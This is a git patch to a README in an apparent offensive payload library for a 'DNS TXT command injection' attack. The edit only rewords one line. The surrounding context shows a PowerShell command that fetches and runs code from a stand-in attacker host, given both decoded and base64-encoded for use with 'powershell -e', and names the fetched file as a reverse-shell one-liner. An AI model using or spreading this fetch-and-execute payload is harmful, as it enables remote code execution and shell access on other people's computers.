From fc745db314c058ead78a88f2202d2bf5db537f4c Mon Sep 17 00:00:00 2001 From: Nate <101878955+nathansb2022@users.noreply.github.com> Date: Sat, 3 Aug 2024 23:40:57 -0500 Subject: [PATCH] Update README.md --- payloads/library/execution/DNS-TXT-CommandInection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/execution/DNS-TXT-CommandInection/README.md b/payloads/library/execution/DNS-TXT-CommandInection/README.md index 7564a94..e03eb47 100644 --- a/payloads/library/execution/DNS-TXT-CommandInection/README.md +++ b/payloads/library/execution/DNS-TXT-CommandInection/README.md @@ -11,7 +11,7 @@ DEFINE #MY_TARGET_URL example.com No base64 can be used as an option by replacing "$a=",";powershell -e $a" with just "|iex" for the STRING payload below. Examples of the decoded command and encoded command are shown below to put into DNS TXT record. Decoded: "irm http://MY_TARGET_URL/T1.txt | iex" Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA==" -powershellReverseShellOne-liner.ps1 is identical to T1.txt. (shortened due to character limitations) +powershellReverseShellOne-liner.ps1 is identical to T1.txt. (file name shortened due to character limitations) ## Windows Commands (used in payload) ### Execute DNS TXT Payload ```Powershell